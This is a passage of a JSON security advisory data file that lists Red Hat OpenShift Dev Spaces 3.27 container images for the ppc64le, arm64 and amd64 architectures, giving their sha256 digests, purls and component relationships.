"purl": "pkg:oci/pluginregistry-rhel9@sha256%3Addbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1773775544"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"product_id": "registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/server-rhel9@sha256%3A4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774228740"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"product_id": "registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/traefik-rhel9@sha256%3Ae9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774227265"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le",
"product_id": "registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/udi-rhel9@sha256%3Af6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774451954"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel10@sha256%3Adb2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774143680"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel9@sha256%3A5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774070844"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"product": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"product_id": "registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"product_identification_helper": {
"purl": "pkg:oci/code-rhel9@sha256%3Acad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774448966"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"product": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"product_id": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/code-sshd-rhel9@sha256%3A6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774422248"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"product": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"product_id": "registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/configbump-rhel9@sha256%3Aacaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774155063"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"product": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"product_id": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"product_identification_helper": {
"purl": "pkg:oci/dashboard-rhel9@sha256%3A272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774476526"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"product": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"product_id": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"product_identification_helper": {
"purl": "pkg:oci/imagepuller-rhel9@sha256%3A8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774587761"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"product": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"product_id": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"product_identification_helper": {
"purl": "pkg:oci/jetbrains-ide-rhel9@sha256%3A0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774414236"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"product": {
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"product_id": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-redirector-rhel9@sha256%3Ac82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1773775028"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"product": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"product_id": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openvsx-rhel9@sha256%3Aaae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1773775064"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"product": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"product_id": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-rhel9-operator@sha256%3Ab317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774607447"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"product": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"product_id": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pluginregistry-rhel9@sha256%3A31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1773775544"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"product": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"product_id": "registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"product_identification_helper": {
"purl": "pkg:oci/server-rhel9@sha256%3Ac51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774228740"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"product": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"product_id": "registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/traefik-rhel9@sha256%3Ab5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774227265"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"product": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"product_id": "registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"product_identification_helper": {
"purl": "pkg:oci/udi-rhel9@sha256%3A8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774451954"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel10@sha256%3A84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774143680"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"product": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"product_id": "registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"product_identification_helper": {
"purl": "pkg:oci/code-rhel9@sha256%3A1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774448966"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"product": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"product_id": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"product_identification_helper": {
"purl": "pkg:oci/code-sshd-rhel9@sha256%3Aed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774422248"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"product": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"product_id": "registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"product_identification_helper": {
"purl": "pkg:oci/configbump-rhel9@sha256%3A81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774155063"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"product": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"product_id": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/dashboard-rhel9@sha256%3Ae139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774476526"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"product": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"product_id": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"product_identification_helper": {
"purl": "pkg:oci/imagepuller-rhel9@sha256%3A0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774587761"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"product": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"product_id": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/jetbrains-ide-rhel9@sha256%3Aed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774414236"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"product": {
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"product_id": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-redirector-rhel9@sha256%3Aef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1773775028"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"product": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"product_id": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openvsx-rhel9@sha256%3A49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1773775064"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"product": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"product_id": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-rhel9-operator@sha256%3A6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774607447"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"product": {
"name": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"product_id": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-operator-bundle@sha256%3Ad25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774609756"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"product": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"product_id": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pluginregistry-rhel9@sha256%3Ab6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1773775544"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"product": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"product_id": "registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"product_identification_helper": {
"purl": "pkg:oci/server-rhel9@sha256%3A782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774228740"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"product": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"product_id": "registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/traefik-rhel9@sha256%3A3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774227265"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"product": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"product_id": "registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/udi-rhel9@sha256%3Acef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774451954"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel10@sha256%3Ae5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774143680"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel9@sha256%3Ae095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774070844"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64"
},
"product_reference": "registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x"
},
"product_reference": "registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64"
},
"product_reference": "registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
